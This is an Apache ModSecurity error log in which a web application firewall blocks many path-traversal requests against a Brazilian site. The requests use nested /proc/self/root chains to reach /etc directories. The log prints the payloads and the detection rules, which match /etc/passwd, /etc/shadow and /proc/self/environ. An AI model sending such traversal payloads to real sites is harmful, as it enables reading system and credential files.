[Tue Mar 17 12:03:51.842232 2026] [:error] [pid 2598:tid 140411557287680] [client 74.7.243.203:42280] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltVxj0p0SRWAqcjGFuPQAAAxY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:03:53.368945 2026] [:error] [pid 2598:tid 140411624429312] [client 74.7.243.203:42286] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltWRj0p0SRWAqcjGFuPwAAAw4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:03:54.686147 2026] [:error] [pid 17965:tid 140411741927168] [client 74.7.243.203:42294] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltWqt8Nd0UC_OcbVG-EwAAAIA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:03:55.772956 2026] [:error] [pid 7437:tid 140411699963648] [client 74.7.243.203:42310] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltWweiSKl8TjouI-YPogAAA8U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:03:58.100326 2026] [:error] [pid 17965:tid 140411658000128] [client 74.7.243.203:42326] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltXqt8Nd0UC_OcbVG-FgAAAIo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:03:59.376048 2026] [:error] [pid 9299:tid 140411699963648] [client 74.7.243.203:42334] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltX7-sgTmmJoPuMdysDQAAAsU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:04:00.542866 2026] [:error] [pid 11293:tid 140411641214720] [client 74.7.243.203:51894] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltYNCmCSWTlPouqorZlAAAAMw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:04:01.939421 2026] [:error] [pid 9155:tid 140411540502272] [client 74.7.243.203:51902] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltYdbI7zhHXcabyMUz0AAAAlg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:04:07.744333 2026] [:error] [pid 9299:tid 140411716749056] [client 74.7.243.203:51914] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltZ7-sgTmmJoPuMdysEgAAAsM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:04:10.257403 2026] [:error] [pid 11293:tid 140411658000128] [client 74.7.243.203:51920] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltatCmCSWTlPouqorZlgAAAMo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:04:11.596800 2026] [:error] [pid 9299:tid 140411548894976] [client 74.7.243.203:57948] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablta7-sgTmmJoPuMdysFAAAAtc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:04:13.989653 2026] [:error] [pid 19507:tid 140411582465792] [client 74.7.243.203:57960] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltbdY0UrI5A3LftIzwWQAAAZM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:04:15.292748 2026] [:error] [pid 9155:tid 140411658000128] [client 74.7.243.203:57974] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltb9bI7zhHXcabyMUz0QAAAko"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:04:16.601942 2026] [:error] [pid 2473:tid 140411674785536] [client 74.7.243.203:57986] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltcKBJNF7axNlVR0UKdQAAAAg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:04:17.947898 2026] [:error] [pid 9299:tid 140411616036608] [client 74.7.243.203:57998] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltcb-sgTmmJoPuMdysFgAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:04:19.120908 2026] [:error] [pid 7437:tid 140411649607424] [client 74.7.243.203:58004] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltcweiSKl8TjouI-YPpAAAA8s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:04:24.126763 2026] [:error] [pid 19507:tid 140411557287680] [client 74.7.243.203:56484] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablteNY0UrI5A3LftIzwXQAAAZY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:04:25.471514 2026] [:error] [pid 19507:tid 140411548894976] [client 74.7.243.203:56492] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltedY0UrI5A3LftIzwXgAAAZc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:04:27.799690 2026] [:error] [pid 7437:tid 140411691570944] [client 74.7.243.203:56494] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablteweiSKl8TjouI-YPpgAAA8Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:04:29.147306 2026] [:error] [pid 11293:tid 140411565680384] [client 74.7.243.203:56510] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltfdCmCSWTlPouqorZlwAAANU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:04:35.683447 2026] [:error] [pid 18380:tid 140411590858496] [client 74.7.243.203:60804] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltg64xEDsg_V3ESNZAfQAAAhI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self
[Tue Mar 17 12:04:47.067457 2026] [:error] [pid 2160:tid 140411725141760] [client 74.7.241.46:58946] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltjzjrdei6i7MVRTDRXQAAAQI"], referer: 